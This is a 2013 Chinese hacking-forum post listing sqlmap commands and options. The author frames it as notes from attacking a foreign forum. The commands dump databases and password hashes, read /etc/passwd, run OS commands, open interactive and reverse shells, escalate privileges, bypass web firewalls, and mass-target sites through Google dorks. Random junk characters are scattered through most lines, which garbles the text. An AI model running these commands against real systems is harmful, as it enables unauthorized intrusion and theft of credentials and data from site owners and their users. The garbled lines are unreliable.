中国网络渗透测试联盟

标题: sqlmap注入命令的使用方法 [打印本页]
作者: admin    时间: 2013-4-4 22:26
标题: sqlmap注入命令的使用方法
今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、
" [# u8 B4 p8 W! v9 Osqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称
) l# C4 |/ i9 E$ \( G6 Gsqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名
( X2 H9 A( g' gsqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段1 n% C: d& }6 y

! F4 \# L& X0 z& g7 Esqlmap  -u  “http://url/news?id=1″  –dump  -C  “column_name”  -T “table_name”-D “db_name”-v& r  `8 Y" c' O
0 #获取字段内容
# E) Q: F# _5 r- T0 e
! M& e2 ^) [# X. J, B1 z( j1 q******************信息获取******************  |; n+ `" f; R. D& W
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型2 y7 g$ w$ |! g) o7 Q6 @
sqlmap -u “http://url/news?id=1″ –users #列数据库用户8 d1 y  w" ~) s9 c$ l1 y
sqlmap -u “http://url/news?id=1″ –dbs#列数据库7 W; g+ c% p7 I7 R" `
sqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码
1 p* K* b/ s. A9 Z# s6 Tsqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码0 l9 A: d( a0 p4 k" x7 e& B" x, ]
sqlmap  -u  “http://url/news?id=1″   –dump  -C  “password,user,id”  -T “tablename”-D “db_name”# X0 }- i: G2 Y2 Y" B  L
–start 1 –stop 20 #列出指定字段,列出20 条6 d7 a/ j" o- Q, N! ?9 @
sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表
* v7 Y. n8 T1 z! `: `; n+ xsqlmap -u “http://url/news?id=1″ –privileges #查看权限
! K* E( K; M5 d  @sqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色- M# L3 J4 |8 O/ e* x( T/ w
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)
$ {, i  L& W) N+ _' j$ qsqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表- W+ \9 |: c# O) i: T- N6 o8 b" m
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录
' q" Z- |* k5 b4 |sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入1 j' P+ @1 F" U; F8 a% A
sqlmap -u “http://url/news?id=1″-b #获取banner信息
3 g2 {" L9 y4 d1 I6 u( [( Xsqlmap -u “http://url/news?id=1″ –data “id=3″#post注入3 l8 m! E( l# q7 |: o3 @% c4 o. D
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型
/ ]/ A! @" a' P( \; \2 @1 r& ]2 }sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入: U5 O4 C) \5 p2 ]# b& h4 C  u
sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词2 ?- c+ N! B) g: D9 B
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令1 O% o' R8 o/ c4 G& F
sqlmap -u “http://url/news?id=1″ –file /etc/passwd
. n: y" O, F- b$ v( P0 S; ^sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令3 W: b# X, k2 S! U0 w, I& E
sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
! a- X8 X$ u9 L+ }* N& tsqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表6 t3 ~( c9 p2 R4 L9 o* m
sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度
5 R9 O) Q1 u: \( D7 y  V2 b2 H% Qsqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度$ `  K7 Y" {6 b8 a
***********高级用法*************
# m. W) U: Z: W9 N4 t9 p' x9 [-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
7 q; N" u1 s. J: x& o9 Csqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段          需保证google.com能正常访问
" Y$ ^# \) U+ [  H+ k) k–technique   测试指定注入类型\使用的技术5 V3 O' n+ q2 \( g5 u" Y
不加参数默认测试所有注入技术3 P4 h- {  \" Y- Z; P0 T9 G$ l
•     B: 基于布尔的SQL 盲注
, o: F3 B- [  `5 S# x9 \7 w•     E: 基于显错sql 注入0 M7 C3 E! C' X6 w+ T
•     U: 基于UNION 注入
1 g0 j& [& u- C  g( H4 o8 C! _) ^•     S: 叠层sql 注入$ i1 O# h- Z. R% i! k, @1 |
•     T: 基于时间盲注
% Y4 I7 b- ~3 M–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()- w! [. L2 o- D5 k
–tamper 插件所在目录1 `, d; ?) N- m
\sqlmap-dev\tamper
9 X! K$ V+ d+ o, q: K8 P2 T* Tsqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能4 M& o+ N  |: r
level 执行测试等级 攻击实例:1 n3 u: j+ `5 o& \
Sqlmap -u “http://url/news?id=1&Submit=Submit”
( B+ U9 ]4 [3 t- Y8 y+ z0 w–cookie=”PHPSESSID=41aa833e6d0d
" X6 C% C1 a8 R5 d# `# k) r28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user
' g" u3 u* c. s. ~$ |" L–password
0 [2 M8 I1 |) D# ^参考文档:http://sqlmap.sourceforge.net/doc/README.html
! ?* {1 }) H9 |7 k$ v***********安装最新版本*************
  G* V/ V; S, d1 m. r- mubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版# X- t! D1 {/ A$ N( k
sudo   svn   checkout   https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
6 A( E6 S8 E/ K安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件
. G4 L8 U8 \' _& {sudo vim /home/当前用户/.bashrc
: d$ |  i8 Z" N* y2 U: R, D#任意位置加上:
) q- U+ l2 B1 h& r; @4 valias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效$ E& L2 r. I7 z# f
如果想对所有用户有效 可设置全局 编辑下面的文件
+ p2 R; }2 q* E% p( R0 Bvim /etc/profile
7 D: N% Z) s1 ~  Z. {+ I" }4 t同样加上:
8 G. k" \5 t" w- n) }1 d% kalias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
4 s  W9 _' k! ?$ T******************windows 7 (x64) sqlmap install (SVN)************
3 k+ a5 q1 Q$ khttp://www.python.org/getit/ 安装python6 \* \& \6 I) J! P. h$ F' w& e
http://www.sliksvn.com/en/download 安装windows svn client7 ?2 A6 l7 l: N7 t/ b  p9 E3 e
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
& ]# ~7 x, i% E; B* l5 h安装sqlmap4 ~# q! J; O4 G
*修改环境变量
# h% P2 i3 t' `–version             显示程序的版本号并退出
: t' i' o" ?; d. `-h, –help            显示此帮助消息并退出
' {: b' \4 u$ ^+ e: m$ H-v VERBOSE            详细级别:0-6(默认为1)
0 W2 V7 `2 o! o' r" A# r' gTarget(目标): 以下至少需要设置其中一个选项,设置目标URL。/ Z- t6 v9 E% {- W  T0 ]' H2 V5 A! B: @
-d DIRECT           直接连接到数据库。
$ Q$ a" Q4 _- H: E3 I-u URL, –url=URL   目标URL。
& g: t+ `: ?# d+ F( e/ p- o-l LIST             从Burp 或WebScarab 代理的日志中解析目标。
! t7 S1 c& H8 i) M% z. Z-r REQUESTFILE      从一个文件中载入HTTP 请求。# Q( V/ f5 \# ^: R/ N
-g GOOGLEDORK       处理Google dork 的结果作为目标URL。* l/ E% J( I* k3 `  |7 A+ {
-c CONFIGFILE       从INI 配置文件中加载选项。5 U1 Q5 C7 W) |( f9 N
Request(请求)::0 _" v8 B' h) q6 h- x  W" K
这些选项可以用来指定如何连接到目标URL。
$ C5 A7 y1 U2 p* {1 `: \–data=DATA         通过POST 发送的数据字符串
2 E" s' B  U; y( Q–cookie=COOKIE     HTTP Cookie 头8 u. q& A/ Z! L! |
–cookie-urlencode  URL 编码生成的cookie 注入( \2 m7 h, L- Q, k; Y' K
–drop-set-cookie   忽略响应的Set –Cookie 头信息4 B/ D* C$ ^* h0 }# @  r
! l4 k  t* l2 s* S! K0 S
–user-agent=AGENT  指定  HTTP User –Agent 头) X6 ^" L. C3 u: |
–random-agent      使用随机选定的HTTP User –Agent 头
  I7 h# X1 D$ }8 j& K–referer=REFERER   指定  HTTP Referer 头
" V6 h* a8 g& O# |; ?5 d- m3 Z–headers=HEADERS   换行分开,加入其他的HTTP 头
- U' D+ G- V+ u9 j' S9 _  T–auth-type=ATYPE   HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)$ U/ j! H& j( Y  `& a
–auth-cred=ACRED   HTTP 身份验证凭据(用户名:密码)  k% N% g; W! Y6 A
–auth-cert=ACERT   HTTP 认证证书(key_file,cert_file)
2 m& ~; `* q& C% N2 j! M0 j- P- M–proxy=PROXY       使用HTTP 代理连接到目标URL* L% p8 n6 u9 P$ x
–proxy-cred=PCRED  HTTP 代理身份验证凭据(用户名:密码)! u6 C9 ]0 u# J" O, o: A
–ignore-proxy      忽略系统默认的HTTP 代理% x) `8 k4 \) q* T
–delay=DELAY       在每个HTTP 请求之间的延迟时间,单位为秒3 c2 K* i0 d$ q) o) d
–timeout=TIMEOUT   等待连接超时的时间(默认为30 秒)
; C, i8 `& z9 I–retries=RETRIES   连接超时后重新连接的时间(默认3)! H) Y+ [0 J/ b; s8 V
–scope=SCOPE       从所提供的代理日志中过滤器目标的正则表达式
! q' h8 E: [: t8 I1 s# O" T–safe-url=SAFURL   在测试过程中经常访问的url 地址9 D2 Y7 l; z- z5 F/ N5 d5 I
–safe-freq=SAFREQ  两次访问之间测试请求,给出安全的URL
: ~* i* A1 M# |6 c- k& U1 lOptimization(优化): 这些选项可用于优化SqlMap 的性能。
( V$ |" V. z2 i. w) Q& I" p-o                  开启所有优化开关1 {: S; T2 [# ~9 B5 J( ?  p) n
–predict-output    预测常见的查询输出# v, O3 M/ F, f4 H, S
–keep-alive        使用持久的HTTP(S)连接& T1 d7 m5 O- Z& G7 S% D
–null-connection   从没有实际的HTTP 响应体中检索页面长度
$ r8 b; z5 ?& K–threads=THREADS   最大的HTTP(S)请求并发量(默认为1)) O/ C$ J, _' B1 s  H6 u8 k! m
Injection(注入):
/ P9 m9 Q1 d* P4 W这些选项可以用来指定测试哪些参数,  提供自定义的注入payloads 和可选篡改脚本。- R8 i$ y; N6 ]
-p TESTPARAMETER    可测试的参数(S)
1 F7 e  Z. ^* [# z, W–dbms=DBMS         强制后端的DBMS 为此值
0 N# y' G- h. J- L4 a% ^5 m' R! s# s6 ]–os=OS             强制后端的DBMS 操作系统为这个值5 r- B$ E% f, G) o, ]6 t
–prefix=PREFIX     注入payload 字符串前缀
! v7 G" ~' u+ o7 G6 r2 y3 B! n" K–suffix=SUFFIX     注入 payload 字符串后缀8 A9 \, E$ n; S0 e4 F  P
–tamper=TAMPER     使用给定的脚本(S)篡改注入数据
4 r/ i5 L" ]' y  N. o+ t5 jDetection(检测):
" A6 q' f2 q* O8 J. G) r这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。6 c! {0 w% P3 I- B- ]
–level=LEVEL       执行测试的等级(1-5,默认为1)
" a$ Z  X( |3 Q2 d' |3 d9 ~! _1 \–risk=RISK         执行测试的风险(0-3,默认为1)- ?; Y8 |/ h, v6 ]; A$ X
–string=STRING     查询时有效时在页面匹配字符串* z  \! R- v' e# q
–regexp=REGEXP     查询时有效时在页面匹配正则表达式& i& M) Q, {& C) E4 `
–text-only         仅基于在文本内容比较网页+ j+ K6 T2 l7 g, l; x9 O, A1 S& o
Techniques(技巧): 这些选项可用于调整具体的SQL 注入测试。4 b  ^% G& B) m1 T0 B. e
–technique=TECH    SQL 注入技术测试(默认BEUST)6 M0 x$ i  f% J1 J8 p
–time-sec=TIMESEC  DBMS 响应的延迟时间(默认为5 秒)
2 k6 Q8 z$ g9 d2 x  V8 ^( P$ C–union-cols=UCOLS  定列范围用于测试UNION 查询注入
1 I: E: E: a7 _# [9 c3 ^( V* ~–union-char=UCHAR  用于暴力猜解列数的字符4 U. }9 f, Y) M" l
Fingerprint(指纹):
9 s; T* j0 j, i& s& ]- w/ }-f, –fingerprint     执行检查广泛的DBMS 版本指纹
" i; e, x; Y# z) n! SEnumeration(枚举):
  g. }9 t3 q3 F
1 Y/ o6 T* k& f: I这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
% v" b; f# f' m: Q; ?-b, –banner        检索数据库管理系统的标识* o. ], c) G5 u) M$ `
–current-user      检索数据库管理系统当前用户7 y) k3 l! o. W3 X
–current-db        检索数据库管理系统当前数据库4 N+ a) W# q/ |
–is-dba            检测DBMS 当前用户是否DBA
- W, Y7 |& l6 _–users             枚举数据库管理系统用户
. J5 [6 _$ q2 N+ k–passwords         枚举数据库管理系统用户密码哈希6 h" f( K; {' A( f  o
–privileges        枚举数据库管理系统用户的权限
" X" W, l* L3 j, c) `+ l; T' Z+ X, M–roles             枚举数据库管理系统用户的角色- ~. ^( V, ]* Z' [, k7 f! F
–dbs               枚举数据库管理系统数据库
; q; j; X5 w/ {- w6 O+ A, O/ m* D–tables            枚举的DBMS 数据库中的表: f, W+ t& G: e  f4 X3 ~0 b, y  D
–columns           枚举DBMS 数据库表列: Y9 N2 D7 t( [- n* j
–dump              转储数据库管理系统的数据库中的表项
) ^1 i5 A$ {; {2 W3 b9 p–dump-all          转储所有的DBMS 数据库表中的条目- [) ^2 r+ M% ]) b* I  I9 N
–search            搜索列(S),表(S)和/或数据库名称(S)
& A* y7 {4 Y) R* a2 d2 d+ \" n  t& g-D DB               要进行枚举的数据库名, u0 {" Q7 w1 j3 M) r# j
-T TBL              要进行枚举的数据库表4 b: n( i" j, S. x
-C COL              要进行枚举的数据库列
/ B3 j9 n2 d+ N$ e7 M-U USER             用来进行枚举的数据库用户4 v& t* p- S+ z0 y" P5 W6 X: K
–exclude-sysdbs    枚举表时排除系统数据库# @& i' S. g4 T* v% {( V
–start=LIMITSTART  第一个查询输出进入检索: h  y9 f+ s" q; I: B" G
–stop=LIMITSTOP    最后查询的输出进入检索# ^) u6 V- g" t6 A8 R: o" I& U
–first=FIRSTCHAR   第一个查询输出字的字符检索; G5 W  u7 k6 k0 d* `" }( c
–last=LASTCHAR     最后查询的输出字字符检索
1 b4 ~# W' P9 m( V" P1 J–sql-query=QUERY   要执行的SQL 语句9 j7 w0 r' g1 b2 {4 \+ U# k8 X  l
–sql-shell         提示交互式SQL 的shell
5 l1 S: _$ R9 `! Q5 @- SBrute force(蛮力): 这些选项可以被用来运行蛮力检查。
4 ~# E7 @9 {$ B, g( m8 G0 M–common-tables     检查存在共同表, q0 W  F. a+ O  f
–common-columns    检查存在共同列- p. ^7 \4 P; F8 C2 b
User-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。
& `$ d. D3 \  E–udf-inject        注入用户自定义函数: _" R0 Z; j: {/ n
–shared-lib=SHLIB  共享库的本地路径/ u; _* k! A/ a0 L) [: W
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
8 c. i+ M. v2 D7 o5 o5 d–file-read=RFILE   从后端的数据库管理系统文件系统读取文件3 s% j$ x4 l, i+ X
–file-write=WFILE  编辑后端的数据库管理系统文件系统上的本地文件
1 C3 Y8 E+ x# o: z8 T% v–file-dest=DFILE   后端的数据库管理系统写入文件的绝对路径8 m) V# I1 g1 w; ~. V+ B% l
Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。
2 n0 R, U- b3 X; [- l8 q2 k–os-cmd=OSCMD      执行操作系统命令4 [8 h: |8 E# b8 y' o
–os-shell          交互式的操作系统的shell3 g' ]' I+ Q1 T% L. R; O
–os-pwn            获取一个OOB shell,meterpreter 或VNC# A, e0 }/ Q7 p; y
–os-smbrelay       一键获取一个OOB shell,meterpreter 或VNC
9 E0 |: T" o5 G–os-bof            存储过程缓冲区溢出利用
' E5 C/ K% `* h! X4 S) S–priv-esc          数据库进程用户权限提升' q+ {+ W8 J% |7 s
–msf-path=MSFPATH  Metasploit Framework 本地的安装路径
4 W9 G0 J6 e5 e4 l8 D5 C. J–tmp-path=TMPPATH  远程临时文件目录的绝对路径1 P* L' f. d% F# l! v& `
) l# S. A5 i& ^3 v) t+ u, h
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。- e: C3 J" j, o- @
–reg-read          读一个Windows 注册表项值
0 s+ b3 e" W2 ?, i–reg-add           写一个Windows 注册表项值数据
4 ~. s. ]7 a$ b4 d7 N9 _4 ~–reg-del           删除Windows 注册表键值3 c; L' ?- t- g# P* r3 L
–reg-key=REGKEY    Windows 注册表键9 }) r) L5 {0 r& h+ @
–reg-value=REGVAL  Windows 注册表项值
  v) v7 I/ z4 V4 v7 V1 r–reg-data=REGDATA  Windows 注册表键值数据4 i2 a& S. u: l, O0 [
–reg-type=REGTYPE  Windows 注册表项值类型
1 Z6 G2 Q( H& n$ vGeneral(一般): 这些选项可以用来设置一些一般的工作参数。
2 h1 h$ [, K9 R% g. p-t TRAFFICFILE      记录所有HTTP 流量到一个文本文件中
8 y# J" d7 \6 a- c) \-s SESSIONFILE      保存和恢复检索会话文件的所有数据2 e$ x4 {9 \0 q' t' e$ i- y# I8 |
–flush-session     刷新当前目标的会话文件
( G- Y: S) T' K8 `/ {9 ]–fresh-queries     忽略在会话文件中存储的查询结果/ \  @+ {7 P! ]- G! N4 \
–eta               显示每个输出的预计到达时间
8 b' Q6 C" @* h- X–update            更新SqlMap$ g7 ]. ~7 N4 A9 G; a4 ^
–save              file 保存选项到INI 配置文件
5 @- M$ h( F5 Z! P: F7 R' w–batch             从不询问用户输入,使用所有默认配置。
; Y7 Y8 j! x) j9 j! f4 X: MMiscellaneous(杂项):6 d$ d* K9 |& H0 }5 Q4 M
–beep              发现SQL 注入时提醒3 _! a. s1 Y# L" X
–check-payload     IDS 对注入payloads 的检测测试/ e- ]0 O# O9 y' S( U' t( }; x
–cleanup           SqlMap 具体的UDF 和表清理DBMS4 e7 t% c) z. A7 @5 p% Y
–forms             对目标URL 的解析和测试形式
& ?  a7 x" ?0 Q8 a- W/ ^–gpage=GOOGLEPAGE  从指定的页码使用谷歌dork 结果) ]9 n+ ]) A1 S) J4 c0 r$ u
–page-rank         Google dork 结果显示网页排名(PR)
4 x9 F9 e7 {) d5 r' g* r# t–parse-errors      从响应页面解析数据库管理系统的错误消息
" }; ^. B+ t' O–replicate         复制转储的数据到一个sqlite3 数据库- @6 C6 r0 W( t0 S: ?4 e
–tor               使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址+ C* Y4 q" {7 f( t& r$ L
–wizard            给初级用户的简单向导界面



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2